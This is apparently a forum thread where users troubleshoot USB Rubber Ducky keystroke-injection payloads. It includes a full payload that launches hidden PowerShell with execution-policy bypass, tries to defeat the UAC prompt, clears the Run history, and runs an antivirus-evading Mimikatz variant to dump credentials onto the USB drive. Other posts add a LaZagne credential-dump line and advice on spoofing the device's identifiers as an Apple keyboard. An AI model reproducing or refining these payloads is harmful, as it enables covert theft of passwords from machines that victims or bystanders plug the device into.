L07TB0Y

now can someone port it over to PineApple

here is my code DELAY 3000 ESC DELAY 300 GUI r DELAY 500 ENTER STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" DELAY 1000 ALT Y DELAY 1000 LEFTARROW DELAY 300 ENTER DELAY 500 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d DELAY 300 ENTER DELAY 1000 STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';" DELAY 300 ENTER issue 1: THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work FILES is the name of rubber ducky lb.ps1 is the customized mimi that does not get detected by AV etc what am i doing wrong?

http://superuser.com/questions/75614/take-a-screen-shot-from-command-line-in-windows

what version of windows 10 are you using? home, enterprise? is it patched?

i found it on https://www.ducktoolkit.com/ as well but that does not tell you what to name the file so i named it vidpid.bin and it seems to work

check out Darren and Snubs youtube channel that is a wealth of knowledge. In any case if you are lazy you can change the PIV/DIV of the ducky to make it look like an apple keyboard and apple will not ask you to setup the keyboard. check out the wiki for the rest of your stuff

i have twin ducky flashed and i want to keep it but i want to swap my PIV/DIV to Apple keyboard is it possible?

not ture mimikatz still works in win10 i just tested

STRING %DUCKYdrive%\lazagne.exe all you have to remove drive from the %DUCKYdrive% to write to usb STRING %DUCKY%\lazagne.exe all | Out-File '%DUCKY%\%computername%_creds.txt';"

so when ever i need to leverage a administrator powershelgl it prompts me to say OK on UAC. Alt Y does not work. I have even tried left arrow and space bar but what i have found is i need to do Alt Tab and than left arrow and space but there is no Alt Tab in ducky so anyone found a work around that works?

well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou t-File '%duck%\%computername%_creds.txt';" .\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ... + ~~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess

did you find a solution? i am running into the same thing and well even if i choose to run the UAC i am not getting a file so

i just got my ducky and i am in the research phase so can any one tell me why do the twin duck when the ducky-decode does the mass storage and multiple payloads etc

if you are not good with tech what are you doing with a rubber ducky?

why the development on this has stopped? this sounds like a wonderfull tool especially the twin duck and multiple payloads